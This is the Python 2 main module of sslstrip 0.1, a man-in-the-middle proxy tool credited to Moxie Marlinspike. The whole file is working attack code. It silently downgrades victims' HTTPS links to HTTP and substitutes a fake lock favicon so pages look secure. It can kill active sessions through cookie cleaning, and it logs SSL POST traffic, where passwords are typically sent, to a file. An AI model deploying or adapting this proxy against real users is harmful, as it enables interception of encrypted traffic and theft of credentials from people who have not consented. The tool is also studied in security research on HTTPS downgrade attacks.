#!/usr/bin/env python
"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks."""

__author__ = "Moxie Marlinspike"
__email__  = "moxie@thoughtcrime.org"
__license__= """
Copyright (c) 2004-2009 Moxie Marlinspike <moxie@thoughtcrime.org>

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA

"""

import getopt
import logging
import traceback
import string,cgi,time,re,sys,os
import BaseHTTPServer, select, socket, SocketServer
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

from sslstrip.DataShuffler import DataShuffler
from sslstrip.SSLDataShuffler import SSLDataShuffler
from sslstrip.SecureLinkListener import SecureLinkListener
from sslstrip.RetrySecureException import RetrySecureException
from sslstrip.CookieCleaner import CookieCleaner

gVersion = "0.1"

class StripProxy(BaseHTTPRequestHandler, SecureLinkListener):
    '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
    This is the basic proxy server class, where we get callbacks for GET and POST methods.
    We then proxy these out using HTTP or HTTPS depending on what information we have about
    the (connection, client_address) tuple in our cache.  

    This class also implements SecureLinkListener and gets callbacks about links that are
    being stripped, so that we can hit those on future connections.

    There's a *lot* of room for optimization here.  Binary data should be shuttled rapid-fire,
    regular expressions should be compiled static members, etc...
    
    '''

    cookieCleaner  = CookieCleaner();
    strippedURLs   = set()
    secureFavicons = set()
    swapFavicon   = False
    killSessions  = False
    
    def addLink(self, link):
        '''Callback to notify us of a stripped URL.'''
        client, port = self.client_address

        self.strippedURLs.add((client, link))

    def addSecureFavicon(self, link):
        '''Callback to notify us of a favicon URL that should be secure.'''
        client, port = self.client_address
        
        self.secureFavicons.add((client, link))

    def isPost(self):
        return self.command == "POST"
    
    def isIconRequest(self):
        if not StripProxy.swapFavicon: return False
        
        client, port = self.client_address
        host         = self.headers['Host']
        
        return (self.path.find("favicon.ico") != -1) or ((client, 'http://' + host + self.path) in self.secureFavicons)
    
    def isSecureRequest(self):
        host         = self.headers['Host'];
        request      = "http://" + host + self.path
        client, port = self.client_address
        
        return (client,request) in self.strippedURLs

    def cleanCookies(self):
        if StripProxy.killSessions and self.cookieCleaner.clean(self):
            logging.debug("Dirty cookies, stopping request...")
            return True
        else:
            logging.debug("Clean cookies, continuing...")
            False

    def getPathToLockIcon(self):
        if os.path.exists("lock.ico"): return "lock.ico"

        scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
        scriptPath = scriptPath + "../share/sslstrip/lock.ico"

        if os.path.exists(scriptPath): return scriptPath

        logging.warning("Error: Could not found lock.ico")
        return "lock.ico"        

    def sendBackSecureIcon(self):
        logging.debug("Sending back secure favicon.")
        
        icoFile = open(self.getPathToLockIcon())
        
        self.send_response(200)
        self.send_header('Content-type', 'image/x-icon')
        self.end_headers()
        self.wfile.write(icoFile.read())
        icoFile.close()
        return
        
    def serviceRequestIcon(self, host):
        client,port = self.client_address
        
        if self.isSecureRequest():
            self.sendBackSecureIcon()
            return 
        
        if (client, "http://" + host + "/") in self.strippedURLs:
            self.sendBackSecureIcon()
            return 
        
        if (client, "http://" + host + "/index.html") in self.strippedURLs:
            self.sendBackSecureIcon()
            return 
        
        if (client, "http://" + host + "/index.jsp") in self.strippedURLs:
            self.sendBackSecureIcon()
            return 
        
        if (client, "http://" + host + "/index.php") in self.strippedURLs:
            self.sendBackSecureIcon()
            return 
        
        if (client, "http://" + host + "/index.asp") in self.strippedURLs:
            self.sendBackSecureIcon()
            return
        
        self.serviceRequestCleartext(host)


    def serviceRequestCleartext(self, host):
        try:
            dataShuffler = DataShuffler(self.connection, host, self)
            self.serviceRequestCommon(dataShuffler)
        except RetrySecureException:
            logging.warning('Possibly guessed wrong on ' + host + ', trying SSL instead...')
            self.serviceRequestSecure(host)                    

    def serviceRequestSecure(self, host):
        dataShuffler = SSLDataShuffler(self.connection, host, self)
        self.serviceRequestCommon(dataShuffler)

    def serviceRequestCommon(self, dataShuffler):
        dataShuffler.sendRequest(self.command, self.path, self.headers)
        if self.headers.has_key('Content-Length'):
            dataShuffler.sendPotentialData(self.rfile, int(self.headers['Content-Length']))
        dataShuffler.handleResponse()
        dataShuffler.close()
        
    def serviceRequest(self):
        '''This is where all the action begins.  Incoming HTTP requests start here.'''
        
        logging.debug("Got request: %s %s" % (self.command, self.path));

        if not self.cleanCookies():
            host = self.headers['Host'];
        
            try:
                if   self.isIconRequest():   self.serviceRequestIcon(host)
                elif self.isSecureRequest(): self.serviceRequestSecure(host)
                else:                        self.serviceRequestCleartext(host)
            except:
                logging.exception('Connection failed: ' + host)        
            
    do_HEAD   = serviceRequest
    do_POST   = serviceRequest
    do_PUT    = serviceRequest
    do_DELETE = serviceRequest
    do_GET    = serviceRequest
    
class ThreadingHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer): pass

def usage():
    print "\nsslstrip " + gVersion + " by Moxie Marlinspike"
    print "Usage: sslstrip <options>\n"
    print "Options:"
    print "-w <filename>, --write=<filename> Specify file to log to (optional)."
    print "-p , --post                       Log only SSL POSTs. (default)"
    print "-s , --ssl                        Log all SSL traffic to and from server."
    print "-a , --all                        Log all SSL and HTTP traffic to and from server."
    print "-l <port>, --listen=<port>        Port to listen on (default 10000)."
    print "-f , --favicon                    Substitute a lock favicon on secure requests."
    print "-k , --killsessions               Kill sessions in progress."
    print "-h                                Print this help message."
    print ""
    
    
def main(argv):
    try:
        logFile    = 'sslstrip.log'
        logLevel   = logging.DEBUG
        listenPort = 10000
        
        try:                                
            opts, args = getopt.getopt(argv, "hw:l:psafk", 
                                       ["help", "write=", "post", "ssl", "all", "listen=", 
                                        "favicon", "killsessions"])

            for opt, arg in opts:
                if opt in ("-h", "--help"):
                    usage()
                    sys.exit()
                elif opt in ("-w", "--write"):
                    logFile = arg
                elif opt in ("-p", "--post"):
                    logLevel = logging.WARNING
                elif opt in ("-s", "--ssl"):
                    logLevel = logging.INFO
                elif opt in ("-a", "--all"):
                    logLevel = logging.DEBUG
                elif opt in ("-l", "--listen"):
                    listenPort = arg
                elif opt in ("-f", "--favicon"):
                    StripProxy.swapFavicon = True
                elif opt in ("-k", "--killsessions"):
                    StripProxy.killSessions = True
                    
        except getopt.GetoptError:           
            usage()                          
            sys.exit(2)                     
        
        logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s',
                            filename=logFile, filemode='w')
                
        server = ThreadingHTTPServer(('', listenPort), StripProxy)
        server.serve_forever()

    except KeyboardInterrupt:
        print '^C received, shutting down server'
        server.socket.close()

if __name__ == '__main__':
    main(sys.argv[1:])

